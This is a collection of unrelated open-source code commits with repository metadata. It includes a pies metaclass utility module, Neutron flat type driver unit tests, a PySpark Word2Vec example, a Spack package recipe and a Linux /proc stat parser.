Send a command to host
"""
def send(self, cmd):
self.sock.send(cmd)
"""recieve:
Recieve a response from host
"""
def recieve(self):
self.sock.recieve(cmd)
### Replace xx:xx:xx:xx:xx:xx with your test device address
#test = RXComm('xx:xx:xx:xx:xx:xx', 'Test Device')
#test.connect()
#test.send('date')
#test.disconnect()
| apache-2.0 | Python |
|
4053aa99100e2fdc1a342a472492f53138a66d6b | Add internal utils module | lisongmin/pies,AbsoluteMSTR/pies,AbsoluteMSTR/pies,timothycrosley/pies,timothycrosley/pies,lisongmin/pies | pies/_utils.py | pies/_utils.py | """
pies/_utils.py
Utils internal to the pies library and not meant for direct external usage.
Copyright (C) 2013 Timothy Edmund Crosley
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and
to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or
substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED
TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL
THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF
CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
OTHER DEALINGS IN THE SOFTWARE.
"""
def with_metaclass(meta, *bases):
"""
Enables use of meta classes across Python Versions.
taken from jinja2/_compat.py
Use it like this::
class BaseForm(object):
pass
class FormType(type):
pass
class Form(with_metaclass(FormType, BaseForm)):
pass
"""
class metaclass(meta):
__call__ = type.__call__
__init__ = type.__init__
def __new__(cls, name, this_bases, d):
if this_bases is None:
return type.__new__(cls, name, (), d)
return meta(name, bases, d)
return metaclass('temporary_class', None, {})
def unmodified_isinstance(*bases):
"""
When called in the form MyOverrideClass(unmodified_isinstance(BuiltInClass))
it allows calls against passed in built in instances to pass even if there not a subclass
"""
class UnmodifiedIsInstance(type):
def __instancecheck__(cls, instance):
return isinstance(instance, bases)
return with_metaclass(UnmodifiedIsInstance, *bases)
| mit | Python |
|
dda01f555231b93b91b71a528c210dd722e370d2 | Add flat type driver unittests | gkotton/vmware-nsx,gkotton/vmware-nsx | neutron/tests/unit/ml2/test_type_flat.py | neutron/tests/unit/ml2/test_type_flat.py | # Copyright (c) 2014 Thales Services SAS
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from neutron.common import exceptions as exc
import neutron.db.api as db
from neutron.plugins.common import constants as p_const
from neutron.plugins.ml2 import driver_api as api
from neutron.plugins.ml2.drivers import type_flat
from neutron.tests import base
FLAT_NETWORKS = 'flat_net1, flat_net2'
class FlatTypeTest(base.BaseTestCase):
def setUp(self):
super(FlatTypeTest, self).setUp()
db.configure_db()
self.driver = type_flat.FlatTypeDriver()
self.driver._parse_networks(FLAT_NETWORKS)
self.session = db.get_session()
self.addCleanup(db.clear_db)
def _get_allocation(self, session, segment):
return session.query(type_flat.FlatAllocation).filter_by(
physical_network=segment[api.PHYSICAL_NETWORK]).first()
def test_validate_provider_segment(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.validate_provider_segment(segment)
def test_validate_provider_segment_without_physnet_restriction(self):
self.driver._parse_networks('*')
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'other_flat_net'}
self.driver.validate_provider_segment(segment)
def test_validate_provider_segment_with_missing_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment)
def test_validate_provider_segment_with_unsupported_physical_network(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'other_flat_net'}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment)
def test_validate_provider_segment_with_unallowed_segmentation_id(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1',
api.SEGMENTATION_ID: 1234}
self.assertRaises(exc.InvalidInput,
self.driver.validate_provider_segment,
segment)
def test_reserve_provider_segment(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.reserve_provider_segment(self.session, segment)
alloc = self._get_allocation(self.session, segment)
self.assertEqual(segment[api.PHYSICAL_NETWORK], alloc.physical_network)
def test_release_segment(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.reserve_provider_segment(self.session, segment)
self.driver.release_segment(self.session, segment)
alloc = self._get_allocation(self.session, segment)
self.assertIsNone(alloc)
def test_reserve_provider_segment_already_reserved(self):
segment = {api.NETWORK_TYPE: p_const.TYPE_FLAT,
api.PHYSICAL_NETWORK: 'flat_net1'}
self.driver.reserve_provider_segment(self.session, segment)
self.assertRaises(exc.FlatNetworkInUse,
self.driver.reserve_provider_segment,
self.session, segment)
def test_allocate_tenant_segment(self):
observed = self.driver.allocate_tenant_segment(self.session)
self.assertIsNone(observed)
| apache-2.0 | Python |
|
b52b4cb39029d55a06e15b527cb4789e2988093d | Add word2vec example | bcanvural/thesis,bcanvural/thesis | word2vec.py | word2vec.py | from pyspark.sql import SparkSession
from pyspark.ml.feature import Word2Vec
def main():
spark = SparkSession.builder \
.appName("Spark CV-job ad matching") \
.config("spark.some.config.option", "some-value") \
.master("local[*]") \
.getOrCreate()
# Input data: Each row is a bag of words from a sentence or document.
documentDF = spark.createDataFrame([
("Hi I heard about Spark".split(" "), ),
("I wish Java could use case classes".split(" "), ),
("Logistic regression models are neat".split(" "), )
], ["text"])
documentDF2 = spark.createDataFrame([
("Hi I heard about Spark".split(" "), ),
("I wish Java could use case classes".split(" "), )
], ["text"])
# Learn a mapping from words to Vectors.
word2Vec = Word2Vec(vectorSize=3, minCount=0, inputCol="text", outputCol="result")
model = word2Vec.fit(documentDF)
model2 = word2Vec.fit(documentDF2)
result = model.transform(documentDF)
for row in result.collect():
text, vector = row
print("Text: [%s] => \nVector: %s\n" % (", ".join(text), str(vector)))
if __name__ == '__main__':
main()
| mit | Python |
|
9607c55eacfd58704a4e83a2476471aa2da6124c | add package py-doxypypy (#3284) | krafczyk/spack,mfherbst/spack,krafczyk/spack,tmerrick1/spack,EmreAtes/spack,iulian787/spack,LLNL/spack,EmreAtes/spack,matthiasdiener/spack,LLNL/spack,tmerrick1/spack,EmreAtes/spack,matthiasdiener/spack,EmreAtes/spack,skosukhin/spack,iulian787/spack,lgarren/spack,iulian787/spack,iulian787/spack,mfherbst/spack,tmerrick1/spack,TheTimmy/spack,TheTimmy/spack,tmerrick1/spack,krafczyk/spack,skosukhin/spack,mfherbst/spack,TheTimmy/spack,TheTimmy/spack,skosukhin/spack,lgarren/spack,mfherbst/spack,mfherbst/spack,krafczyk/spack,LLNL/spack,LLNL/spack,lgarren/spack,iulian787/spack,TheTimmy/spack,tmerrick1/spack,krafczyk/spack,matthiasdiener/spack,matthiasdiener/spack,matthiasdiener/spack,skosukhin/spack,lgarren/spack,lgarren/spack,skosukhin/spack,EmreAtes/spack,LLNL/spack | var/spack/repos/builtin/packages/py-doxypypy/package.py | var/spack/repos/builtin/packages/py-doxypypy/package.py | ##############################################################################
# Copyright (c) 2013-2016, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, tgamblin@llnl.gov, All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/llnl/spack
# Please also see the LICENSE file for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class PyDoxypypy(PythonPackage):
"""A Doxygen filter for Python.
A more Pythonic version of doxypy, a Doxygen filter for Python.
"""
homepage = "https://github.com/Feneric/doxypypy"
url = "https://pypi.io/packages/source/d/doxypypy/doxypypy-0.8.8.6.tar.gz"
version('0.8.8.6', '6b3fe4eff5d459400071b626333fe15f')
depends_on('py-setuptools', type='build')
| lgpl-2.1 | Python |
|
83fa6b23563903192376a3419b460b9b06479248 | Add procstat.py | gyulkkajo/linux-util | src/procstat.py | src/procstat.py | import os.path
import argparse
import logging
logging.basicConfig(level=logging.DEBUG)
class Procstat():
PROCSTATPATH = '/proc/%d/stat'
STATLIST = (
'pid',
'comm',
'state',
'ppid',
'pgrp',
'session',
'tty_nr',
'tpgid',
'flags',
'minflt',
'cminflt',
'mjflt',
'cmajflt',
'utime',
'stime',
'cutime',
'cstime',
'priority',
'nice',
'num_threads',
'itrealvalue',
'starttime',
'vsize',
'rss',
'rsslim',
'startcode',
'endcode',
'startstack',
'kstkesp',
'kstkeip',
'signal',
'blocked',
'sigignore',
'sigcatch',
'wchan',
'nswap',
'cnswap',
'exit_signal',
'processor',
'rt_priority',
'policy',
'delayacct_blkio_ticks',
'guest_time',
'cguest_time')
def __init__(self, pid):
fstat = self.PROCSTATPATH % args.pid
if not os.path.exists(fstat):
logging.error('PID is not valid')
return None
with open(fstat, 'r') as f:
procStat = f.readline().split()
self.stat = {}
for i in range(len(self.STATLIST)):
self.stat[self.STATLIST[i]] = procStat[i]
strComm = self.stat['comm']
self.stat['comm'] = str(strComm[1:len(strComm) - 1])
def __str__(self):
rl = ''
for i in self.STATLIST:
rl += '%s(%s)' % (i, self.stat[i])
return rl
def getStat(self, name):
return self.stat[name] if self.stat[name] else ''
def printStat(self, readable=False):
l = ''
for i in self.STATLIST:
v = self.stat[i]
l += '%-12s : %s\n' % (i, v)
print(l)
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Process stat information parser')
parser.add_argument('pid', type=int, help='Pid')
args = parser.parse_args()
pstat = Procstat(args.pid)
pstat.printStat()
| mit | Python |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.